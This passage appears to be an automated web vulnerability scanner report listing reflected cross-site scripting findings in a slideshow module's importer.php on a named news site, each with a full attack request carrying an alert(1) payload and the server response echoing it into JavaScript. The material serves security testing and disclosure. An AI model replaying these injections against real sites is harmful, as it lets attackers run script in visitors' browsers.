Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript

try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":5002ee3a;alert(1)//1593c8e07e8,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_
...[SNIP]...

4.1416. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [animation_slide_type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the animation_slide_type request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c5710%3balert(1)//332a1715734 was submitted in the animation_slide_type parameter. This input was echoed as c5710;alert(1)//332a1715734 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0c5710%3balert(1)//332a1715734&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript

try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0c5710;alert(1)//332a1715734,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inacti
...[SNIP]...

4.1417. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [animation_text_type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the animation_text_type request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c8d26%3balert(1)//5b6a85ca483 was submitted in the animation_text_type parameter. This input was echoed as c8d26;alert(1)//5b6a85ca483 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0c8d26%3balert(1)//5b6a85ca483&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript

try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0c8d26;alert(1)//5b6a85ca483,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "i
...[SNIP]...

4.1418. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [autoanimation parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the autoanimation request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1874f%3balert(1)//ab4ff2d961a was submitted in the autoanimation parameter. This input was echoed as 1874f;alert(1)//ab4ff2d961a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=11874f%3balert(1)//ab4ff2d961a&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript

try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":11874f;alert(1)//ab4ff2d961a,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_bo
...[SNIP]...

4.1419. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [base_bgcolor parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the base_bgcolor request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5afe3"%3balert(1)//006abc4a1a3 was submitted in the base_bgcolor parameter. This input was echoed as 5afe3";alert(1)//006abc4a1a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff5afe3"%3balert(1)//006abc4a1a3&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript

try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff5afe3";alert(1)//006abc4a1a3",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "in
...[SNIP]...

4.1420. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [clickable_slides parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the clickable_slides request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload debb1%3balert(1)//390cebd0cf3 was submitted in the clickable_slides parameter. This input was echoed as debb1;alert(1)//390cebd0cf3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1debb1%3balert(1)//390cebd0cf3 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript

try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffff
...[SNIP]...
":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "interface_y":0,
   "clickable_slides":1debb1;alert(1)//390cebd0cf3,
   "actual_animation":false,
   "actual_animation_p":false,
   "actual_slide":0
};

4.1421. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [interface_x parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the interface_x request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 74487%3balert(1)//eed7b2c0841 was submitted in the interface_x parameter. This input was echoed as 74487;alert(1)//eed7b2c0841 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-2074487%3balert(1)//eed7b2c0841&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript

try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-2074487;alert(1)//eed7b2c0841,
   "interface_y":0,
   "clickable_slides":1,
   "actual_animation":false,
   "actual_animation_p":false,
   "actual_slide":0
};

4.1422. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [interface_y parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the interface_y request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 83470%3balert(1)//8c079405adc was submitted in the interface_y parameter. This input was echoed as 83470;alert(1)//8c079405adc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=083470%3balert(1)//8c079405adc&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript

try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffff
...[SNIP]...
y":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "interface_y":083470;alert(1)//8c079405adc,
   "clickable_slides":1,
   "actual_animation":false,
   "actual_animation_p":false,
   "actual_slide":0
};

4.1423. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [mid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3b6d"%3balert(1)//5a45291e6bc was submitted in the mid parameter. This input was echoed as e3b6d";alert(1)//5a45291e6bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1e3b6d"%3balert(1)//5a45291e6bc&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript

try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1e3b6d";alert(1)//5a45291e6bc"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail
...[SNIP]...

4.1424. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [text_block_opacity parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the text_block_opacity request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 12cd9%3balert(1)//195831b8a90 was submitted in the text_block_opacity parameter. This input was echoed as 12cd9;alert(1)//195831b8a90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=012cd9%3balert(1)//195831b8a90&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript

try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":012cd9;alert(1)//195831b8a90,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "interface_y":0,

...[SNIP]...

4.1425. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_border parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the thumbnail_border request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a678b%3balert(1)//9cf7ce79c61 was submitted in the thumbnail_border parameter. This input was echoed as a678b;alert(1)//9cf7ce79c61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1a678b%3balert(1)//9cf7ce79c61&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript

try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1a678b;alert(1)//9cf7ce79c61,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "interface_y":0,
   "clickable_slides":1,
   "actual_animation":false,
   "actual_animation_p"
...[SNIP]...

4.1426. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_border_color parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the thumbnail_border_color request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca19a"%3balert(1)//c1fee88792f was submitted in the thumbnail_border_color parameter. This input was echoed as ca19a";alert(1)//c1fee88792f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21ca19a"%3balert(1)//c1fee88792f&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript

try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21ca19a";alert(1)//c1fee88792f",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "interface_y":0,
   "clickable_slides":1,
   "actual_animation":false,
   "actual_animation_p":false,
   "actual_slide":0
};

4.1427. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_border_color_inactive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the thumbnail_border_color_inactive request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a1f1"%3balert(1)//90a46394978 was submitted in the thumbnail_border_color_inactive parameter. This input was echoed as 8a1f1";alert(1)//90a46394978 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff8a1f1"%3balert(1)//90a46394978&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript

try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff8a1f1";alert(1)//90a46394978",
   "interface_x":-20,
   "interface_y":0,
   "clickable_slides":1,
   "actual_animation":false,
   "actual_animation_p":false,
   "actual_slide":0
};

4.1428. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_margin parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the thumbnail_margin request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 97436%3balert(1)//8a6cc5501ee was submitted in the thumbnail_margin parameter. This input was echoed as 97436;alert(1)//8a6cc5501ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=597436%3balert(1)//8a6cc5501ee&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
